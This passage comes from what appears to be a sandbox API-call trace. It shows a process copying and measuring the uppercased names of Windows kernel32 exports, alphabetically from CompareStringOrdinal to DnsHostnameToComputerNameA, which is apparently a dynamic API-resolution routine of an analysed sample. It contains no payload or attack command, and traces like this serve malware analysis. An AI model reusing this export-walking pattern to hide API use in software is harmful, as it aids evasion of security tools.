returned 15 [0084.536] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0084.536] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0084.536] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0084.536] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0084.536] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0084.536] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0084.536] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0084.536] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0084.536] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0084.536] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0084.536] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0084.536] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0084.537] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0084.537] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0084.537] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0084.537] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0084.537] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0084.537] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0084.537] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0084.537] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0084.537] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0084.537] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0084.537] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0084.537] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0084.537] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0084.537] lstrlenA (lpString="COPYCONTEXT") returned 11 [0084.537] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0084.537] lstrlenA (lpString="COPYFILEA") returned 9 [0084.537] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0084.537] lstrlenA (lpString="COPYFILEEXA") returned 11 [0084.537] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0084.537] lstrlenA (lpString="COPYFILEEXW") returned 11 [0084.537] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0084.537] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0084.537] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0084.537] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0084.537] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0084.537] lstrlenA (lpString="COPYFILEW") returned 9 [0084.537] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0084.537] lstrlenA (lpString="COPYLZFILE") returned 10 [0084.537] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0084.537] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0084.537] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0084.537] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0084.537] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0084.537] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0084.537] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0084.537] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0084.537] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0084.538] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0084.538] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0084.538] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0084.538] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0084.538] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0084.538] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0084.538] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0084.538] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0084.538] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0084.538] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0084.538] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0084.538] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0084.538] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0084.538] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0084.538] lstrlenA (lpString="CREATEEVENTA") returned 12 [0084.538] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0084.538] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0084.538] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0084.538] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0084.538] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0084.538] lstrlenA (lpString="CREATEEVENTW") returned 12 [0084.538] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0084.538] lstrlenA (lpString="CREATEFIBER") returned 11 [0084.538] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0084.538] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0084.538] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0084.538] lstrlenA (lpString="CREATEFILEA") returned 11 [0084.538] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0084.538] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0084.538] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0084.538] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0084.538] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0084.538] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0084.538] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0084.538] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0084.538] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0084.538] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0084.539] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0084.539] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0084.539] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0084.539] lstrlenA (lpString="CREATEFILEW") returned 11 [0084.539] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0084.539] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0084.539] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0084.539] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0084.539] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0084.539] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0084.539] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0084.539] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0084.539] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0084.539] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0084.539] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0084.539] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0084.539] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0084.539] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0084.539] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0084.539] lstrlenA (lpString="CREATEJOBSET") returned 12 [0084.539] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0084.539] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0084.539] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0084.539] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0084.539] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0084.539] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0084.539] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0084.539] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0084.539] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0084.539] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0084.539] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0084.539] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0084.539] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0084.539] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0084.539] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0084.539] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0084.539] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0084.540] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0084.540] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0084.540] lstrlenA (lpString="CREATEPIPE") returned 10 [0084.540] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0084.540] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0084.540] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0084.540] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0084.540] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0084.540] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0084.540] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0084.540] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0084.540] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0084.540] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0084.540] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0084.540] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0084.540] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0084.540] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0084.540] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0084.540] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0084.540] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0084.540] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0084.540] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0084.540] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0084.540] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0084.540] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0084.540] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0084.540] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0084.540] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0084.540] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0084.540] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0084.540] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0084.540] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0084.540] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0084.540] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0084.540] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0084.540] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0084.541] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0084.541] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0084.541] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0084.541] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0084.541] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0084.541] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0084.541] lstrlenA (lpString="CREATETHREAD") returned 12 [0084.541] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0084.541] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0084.541] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0084.541] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0084.541] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0084.541] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0084.541] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0084.541] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0084.541] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0084.541] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0084.541] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0084.541] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0084.541] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0084.541] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0084.541] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0084.541] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0084.541] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0084.541] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0084.541] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0084.541] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0084.541] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0084.541] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0084.541] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0084.541] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0084.541] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0084.541] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0084.541] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0084.541] lstrlenA (lpString="CTRLROUTINE") returned 11 [0084.541] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0084.541] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0084.542] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0084.542] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0084.542] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0084.542] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0084.542] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0084.542] lstrlenA (lpString="DEBUGBREAK") returned 10 [0084.542] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0084.542] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0084.542] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0084.542] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0084.542] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0084.542] lstrlenA (lpString="DECODEPOINTER") returned 13 [0084.542] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0084.542] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0084.542] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0084.542] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0084.542] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0084.542] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0084.542] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0084.542] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0084.542] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0084.542] lstrlenA (lpString="DELETEATOM") returned 10 [0084.542] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0084.542] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0084.542] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0084.542] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0084.542] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0084.542] lstrlenA (lpString="DELETEFIBER") returned 11 [0084.542] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0084.542] lstrlenA (lpString="DELETEFILEA") returned 11 [0084.542] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0084.542] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0084.542] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0084.542] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0084.542] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0084.542] lstrlenA (lpString="DELETEFILEW") returned 11 [0084.542] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0084.543] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0084.543] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0084.543] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0084.543] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0084.543] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0084.543] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0084.543] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0084.543] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0084.543] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0084.543] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0084.543] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0084.543] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0084.543] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0084.543] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0084.543] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0084.543] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0084.543] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0084.543] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0084.543] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0084.543] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0084.543] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0084.543] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DnsHostnameToComputerNameA" | out: 